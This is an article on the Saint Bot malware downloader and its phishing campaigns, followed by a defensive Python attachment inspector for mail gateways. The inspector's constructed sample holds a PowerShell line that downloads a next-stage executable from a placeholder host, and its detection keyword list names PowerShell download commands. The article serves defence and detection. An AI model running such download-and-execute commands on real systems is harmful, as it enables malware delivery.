Cybercriminals keep developing more sophisticated malware and new methods of deploying it, which makes it difficult for security researchers to keep track of them. Saint Bot Downloader has become a new cyber threat for security researchers in a short span of time.
The findings of researchers from Malwarebytes suggest scammers have launched a new phishing campaign designed to steal credentials and drop malware. The scam sends an email with a bitcoin.zip file attached. The victim is lured into downloading the file with the offer of access to a Bitcoin wallet. This triggers a chain of infections which leads to downloading Saint Bot.
The attached zip file contains a malicious PowerShell script. It tries to download the next stage of malicious payloads from an embedded link, which points to several executable files.
Saint Bot is capable of dropping stealers such as Taurus Stealer or AutoIt-based stealers, though its design indicates it is capable of delivering other kinds of malware as well.
What makes Saint Bot unique?
Saint Bot employs several techniques used primarily in mature malware code. Apart from this, techniques such as code obfuscation, process injection, and anti-analysis have been employed across several stages of the infection cycle.
Saint Bot Downloader's latest targets
Saint Bot malware was used in a number of attacks targeting government institutions. A COVID-19-themed attack was carried out in Georgia, in which emails with LNK files attached were circulated, leading to a malicious document and decoy PDF files used as droppers to deliver Saint Bot malware.
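Both delivery paths described above (a zip attachment carrying a PowerShell script, and LNK shortcut attachments dressed up as documents) can be caught at the mail gateway before anything runs. The following inspector is an added example written for this article, not code from Malwarebytes or from the Saint Bot report: it unpacks an attachment in memory, flags script and shortcut members, decoy double extensions, nested archives, and PowerShell that fetches remote content. The extension lists, the finding reasons and the sample archives are constructed for the example; the URL inside the sample script is a placeholder, not an indicator from the campaign.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumed policy for this example: member types that should never arrive as a
# "wallet" or "guidance" attachment, and document suffixes attackers use as decoys.
RISKY_EXTENSIONS = {".ps1", ".lnk", ".exe", ".dll", ".scr", ".vbs", ".js",
                    ".jse", ".bat", ".cmd", ".hta", ".wsf"}
LURE_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Cheap keyword heuristic for a PowerShell stage that downloads a next stage.
DOWNLOAD_KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest", "start-bitstransfer")


def inspect_archive(archive_bytes: bytes) -> list:
    """Return a list of findings for the members of a zip attachment.

    Each finding is a dict with the member name and a reason string.
    An empty list means nothing in the archive tripped a rule.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(archive_bytes))
    except zipfile.BadZipFile:
        return [{"member": None, "reason": "not a valid zip archive"}]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
            final = suffixes[-1] if suffixes else ""
            if final in RISKY_EXTENSIONS:
                findings.append({"member": name, "reason": f"executable/script member ({final})"})
            # "guidance.pdf.lnk": a document suffix in front of the real, risky type.
            if len(suffixes) >= 2 and suffixes[-2] in LURE_EXTENSIONS and final in RISKY_EXTENSIONS:
                findings.append({"member": name, "reason": "decoy double extension"})
            if final == ".zip":
                # Archives inside archives are a common way past single-layer filters.
                findings.append({"member": name, "reason": "nested archive"})
            if final == ".ps1":
                text = zf.read(info).decode("utf-8", errors="ignore").lower()
                if any(keyword in text for keyword in DOWNLOAD_KEYWORDS):
                    findings.append({"member": name, "reason": "script fetches remote content"})
    return findings


def should_quarantine(archive_bytes: bytes) -> bool:
    """Gateway decision: hold the message if any finding was raised."""
    return bool(inspect_archive(archive_bytes))


def build_sample(members: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}; only used for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample 1: same shape as the bitcoin.zip lure, a PowerShell script that
# fetches a next stage. The URL is a placeholder, not an indicator from the campaign.
SAMPLE_LURE = build_sample({
    "bitcoin.ps1": b"Invoke-WebRequest -Uri http://example.invalid/next-stage -OutFile next.exe\n",
})
# Constructed sample 2: a shortcut disguised as a PDF, like the LNK attachments above.
SAMPLE_LNK = build_sample({"covid_guidance.pdf.lnk": b"L\x00\x00\x00constructed-shortcut"})
# Constructed sample 3: a benign document archive that must pass cleanly.
SAMPLE_BENIGN = build_sample({"report.pdf": b"%PDF-1.4 constructed\n"})

if __name__ == "__main__":
    for label, sample in (("lure", SAMPLE_LURE), ("lnk", SAMPLE_LNK), ("benign", SAMPLE_BENIGN)):
        print(label, "quarantine" if should_quarantine(sample) else "deliver", inspect_archive(sample))
```

The inspector never executes or extracts members to disk; it reads names and, for scripts, a few kilobytes of text, so it is safe to run on every attachment. The extension and keyword lists are a starting point to tune against your own mail traffic, not a complete signature for this malware.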